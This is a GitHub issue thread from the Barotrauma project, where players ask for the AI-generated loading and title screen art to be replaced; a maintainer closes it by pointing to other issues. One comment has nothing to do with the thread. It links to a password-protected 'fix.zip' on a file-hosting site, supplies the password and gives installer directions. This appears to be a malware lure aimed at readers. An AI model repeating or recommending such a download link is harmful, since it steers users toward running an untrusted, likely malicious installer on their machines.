### ISSUE TITLE
Replace AI generated loading and title screen with cooler stuff that fit better

### ISSUE THREAD

**Issue by Regalis11** [FakeFishGames/Barotrauma#14508]
### Discussed in https://github.com/FakeFishGames/Barotrauma/discussions/14276

<div type='discussions-op-text'>

<sup>Originally posted by **girlyguppy** July 10, 2024</sup>
Weird, AI generated images aren't really good to have as the first thing you see when you load into the game.

They aren't interesting to look at, mostly just confusing (because they are incoherent)
It looks like *not barotrauma*, and they are just mediocre. Even a badly done photobash is much more interesting, and the game has plenty of cool art. Maybe the game needs new art, to prevent just reusing the same art everywhere. 

Having a bunch of "generic AI generated submarine" really does not sell the vibe of barotrauma. Please add more art.

A link to the discord forum on the topic, which many people have shared their opinions in:
https://canary.discord.com/channels/103209684680323072/1260663354620645446/1260663354620645446
</div>

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Regalis11** [comment]
Closing in favor of https://github.com/FakeFishGames/Barotrauma-development/issues/6060, https://github.com/FakeFishGames/Barotrauma-development/issues/6066 and https://github.com/FakeFishGames/Barotrauma-development/issues/6070
